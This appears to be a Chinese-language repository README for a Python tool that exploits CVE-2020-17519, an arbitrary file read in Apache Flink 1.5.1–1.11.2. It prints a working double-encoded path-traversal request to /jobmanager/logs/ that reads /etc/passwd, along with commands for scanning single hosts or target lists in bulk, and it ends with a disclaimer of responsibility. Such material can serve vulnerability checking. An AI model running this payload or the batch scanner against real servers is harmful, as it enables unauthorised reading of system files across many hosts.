/CVE-2020-17519-Apache-Flink

CVE-2020-17519; Apache Flink 任意文件读取; 批量检测

Primary LanguagePython

CVE-2020-17519 Apache Flink 任意文件读取

影响范围

Apache Flink 1.5.1 ~ 1.11.2

POC

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

脚本使用方法

python3 CVE-2020-17519 --help 查看使用帮助

python3 CVE-2020-17519 -u http://127.0.0.1:8080 检测某个地址是否存在漏洞

python3 CVE-2020-17519 -f target.txt 批量检测漏洞

免责声明

由传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。